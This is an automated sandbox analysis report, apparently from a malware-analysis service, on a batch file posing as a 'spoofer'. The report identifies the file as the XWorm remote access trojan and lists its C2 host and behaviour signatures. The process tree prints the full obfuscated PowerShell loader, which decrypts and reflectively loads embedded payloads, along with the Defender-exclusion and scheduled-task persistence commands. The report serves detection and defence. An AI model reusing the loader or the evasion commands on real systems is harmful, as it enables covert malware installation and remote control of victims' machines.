Overview

overview

10

Static

static

1

EzzSpoofer.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    179s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-01-2025 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EzzSpoofer.bat

  • Size

    291KB

  • MD5

    93ed121ccdb1d03be4f5fa2013de563d

  • SHA1

    d727b44d67723f8d2ee886b727d1b49c0b61d88c

  • SHA256

    fb3ede897d32b7d8a9b16fa2fb1ee1648fceb49bc253f65984708c58f6454bcd

  • SHA512

    0efa1904eef1a0b9ac925b9ef5b5255d37aff31b7f047f038ec780069b5042e1cf17f5fbb3ada53cee2e056eeb085932292d4859bc02b5f89a32b810e200373a

  • SSDEEP

    6144:4yWQ3Hb62YBTYYzGeYSXl7TuvwX/oSmp1FBNh:4o6zTN6efzYFTh

Score
10/10
xwormdefense_evasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes
  • Install_directory

    %ProgramData%

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Disables Task Manager via registry modification
    defense_evasion
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzzSpoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HRQ080yVZGdRTztrvWAk69rjJhJ8kv24JyK45A33s78='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n3lZXCHFrDZlOdX5Klqj/Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dkXat=New-Object System.IO.MemoryStream(,$param_var); $gioHA=New-Object System.IO.MemoryStream; $wjXbY=New-Object System.IO.Compression.GZipStream($dkXat, [IO.Compression.CompressionMode]::Decompress); $wjXbY.CopyTo($gioHA); $wjXbY.Dispose(); $dkXat.Dispose(); $gioHA.Dispose(); $gioHA.ToArray();}function execute_function($param_var,$param2_var){ $YESOI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $nNHFI=$YESOI.EntryPoint; $nNHFI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzzSpoofer.bat';$pOAZp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzzSpoofer.bat').Split([Environment]::NewLine);foreach ($bDcuD in $pOAZp) { if ($bDcuD.StartsWith(':: ')) { $DRffE=$bDcuD.Substring(3); break; }}$payloads_var=[string[]]$DRffE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Adds Run key to start application
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3028
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2576
      • C:\Windows\SYSTEM32\shutdown.exe
        shutdown.exe /f /s /t 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1112
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1032
  • C:\ProgramData\powershell.exe
    C:\ProgramData\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1320
  • C:\ProgramData\powershell.exe
    C:\ProgramData\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1516
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2712
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x4 /state0:0xa388c855 /state1:0x41c64e6d
      1⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      PID:5060

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\powershell.exe
      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Filesize

      53KB

      MD5

      a26df49623eff12a70a93f649776dab7

      SHA1

      efb53bd0df3ac34bd119adf8788127ad57e53803

      SHA256

      4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

      SHA512

      e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      2KB

      MD5

      6e6d88960a2258f4590e97c382884634

      SHA1

      244736513d2d071227c3df04532e67c818e7c9cd

      SHA256

      84cc5d85e71eed874541bd9724ebec8827a12b730b72bd8040fec29ab8a37a50

      SHA512

      d2d5d9aa3fb3b9ac0984f2d06da26c857f6d5479a41caa6b54e04e59b9682283219223a7b217cb9e719bad57381030aa87a9b92a6ed15d865f6d6b1eb96bce2b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      bd5940f08d0be56e65e5f2aaf47c538e

      SHA1

      d7e31b87866e5e383ab5499da64aba50f03e8443

      SHA256

      2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

      SHA512

      c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      dbb22d95851b93abf2afe8fb96a8e544

      SHA1

      920ec5fdb323537bcf78f7e29a4fc274e657f7a4

      SHA256

      e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

      SHA512

      16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jaj1mq52.sew.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk
      Filesize

      687B

      MD5

      e1ba2cd776750940a82e3d9c48199103

      SHA1

      f398310c74e105a82a3fc564ff9afa05a4ec0b3b

      SHA256

      1901d44f0b89dd4145b363784528518a41e36db5a92ee7527c16f94c5540a6dc

      SHA512

      3d42a8dfddc09dad7dd7a6cda3199a684d21b2932885acc6823b197e0f9ea2ce046f0b1750d53d2f54c50c7056bb75647e17085e6e352482515ee083f53c50c6

      Download Submit

    • memory/1032-80-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-81-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-82-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-76-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-79-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-78-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-70-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-77-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-71-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1032-69-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1040-66-0x0000024650340000-0x000002465034C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/1040-43-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1040-0-0x00007FFA135D3000-0x00007FFA135D5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1040-67-0x000002466C370000-0x000002466C898000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/1040-68-0x000002466B030000-0x000002466B03A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1040-60-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1040-57-0x00007FFA135D3000-0x00007FFA135D5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1040-65-0x000002466AF10000-0x000002466AF1C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/1040-113-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1040-7-0x00000246503D0000-0x00000246503F2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1040-11-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1040-99-0x000002466B040000-0x000002466B04C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/1040-15-0x000002466A980000-0x000002466A998000-memory.dmp

      Filesize

      96KB

      Download

    • memory/1040-14-0x000002466A920000-0x000002466A958000-memory.dmp

      Filesize

      224KB

      Download

    • memory/1040-13-0x0000024650350000-0x0000024650358000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1040-12-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1320-95-0x000001FFF5A00000-0x000001FFF5A44000-memory.dmp

      Filesize

      272KB

      Download

    • memory/1320-96-0x000001FFF5CF0000-0x000001FFF5D66000-memory.dmp

      Filesize

      472KB

      Download

    • memory/2784-25-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2784-26-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2784-27-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2784-30-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

      Download